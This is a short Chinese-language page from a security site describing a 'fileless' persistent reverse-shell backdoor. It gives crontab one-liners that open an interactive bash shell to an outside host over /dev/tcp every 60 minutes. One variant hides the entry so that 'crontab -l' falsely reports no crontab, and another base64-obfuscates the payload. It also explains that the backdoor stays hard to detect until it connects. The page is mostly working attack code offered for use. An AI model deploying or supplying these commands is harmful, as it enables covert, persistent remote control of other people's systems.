栏目导航: 首页 > 检测提权 > 免杀后门 > 内容

无文件兼容性强的反弹后门

www.hx99.net    时间: 2015-09-16    阅读: 次     整理: 华西安全网

 [plain] view plaincopyprint?

 
  1. 最好用一个不常见的用户执行,任务写入/var/spool/cron/$username   
  2.   
  3. (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -  
  4.   
  5.   
  6. 升级猥琐版,crontab -l 直接提示no crontab for $username   
  7. (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -  
  8.   
  9.   
  10. 60分钟反连一次,在未连接状态启动反连任务的时候,进程和端口都无状态   
  11.   
  12. -bash: connect: Connection refused   
  13. -bash: /dev/tcp/dns.wuyun.org/53: Connection refused   
  14. -bash: 9: Bad file descriptor   
  15. -bash: 9: Bad file descriptor  
  16.   
  17. 也就是说,你安装后,如果不连接成功,是很难被发现的。  

 

 

 

  1. #变异版本  
  2. [root@localhost ~]# (crontab -l;echo '*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a')|crontab -  


本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭